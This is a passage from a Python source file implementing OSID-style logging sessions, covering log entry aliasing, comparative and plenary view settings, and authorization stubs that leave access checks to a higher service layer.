authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_log_entry(self, log_entry_id, alias_id):
"""Adds an ``Id`` to a ``LogEntry`` for the purpose of creating compatibility.
The primary ``Id`` of the ``LogEntry`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another log entry, it is
reassigned to the given log entry ``Id``.
arg: log_entry_id (osid.id.Id): the ``Id`` of a ``LogEntry``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``log_entry_id`` not found
raise: NullArgument - ``log_entry_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=log_entry_id, equivalent_id=alias_id)
class LogEntryLogSession(abc_logging_sessions.LogEntryLogSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``LogEntry`` to ``Log`` mappings.
An entry may appear in multiple ``Logs``. Each ``Log`` may have its
own authorizations governing who is allowed to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'logging.LogEntryLogSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_log_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_log_view(self):
"""A complete view of the ``LogEntry`` and ``Log`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_log_entry_log_mappings(self):
"""Tests if this user can perform lookups of logEntry/log mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This